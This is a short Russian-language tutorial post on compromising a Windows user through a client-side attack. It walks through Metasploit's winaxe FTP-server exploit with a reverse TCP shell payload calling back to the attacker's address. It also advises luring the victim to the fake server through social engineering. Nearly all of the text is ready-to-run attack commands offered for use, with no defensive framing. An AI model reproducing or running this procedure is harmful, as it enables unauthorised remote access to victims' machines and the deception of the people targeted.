Получение доступа к системе через клиентские атаки

Получение доступа к системе через клиентские атаки

Sam Sepiol

Подбираем эксплоит и пейлоад. Делаем так что метасплоит будет работать в режиме сервера.

Создаем фейковый FTP сервер. После отправляем ссылку на сервер пользователю с помощью социальной инженерии.

msf5 > search type:exploit platform:windows winaxe
use exploit/windows/ftp/winaxe_server_ready

далее выбираем payload, к его выбору нужно отнестись серьезно. Payload будет создавать самостоятельный процес.

show payloads
set payload windows/shell/reverse_tcp
set options
set SRVHOST 192.168.1.10
set lhost 192.168.1.10
exploit

после запуска метасплоит будет работать в режиме сервера FTP

sessions

Report Page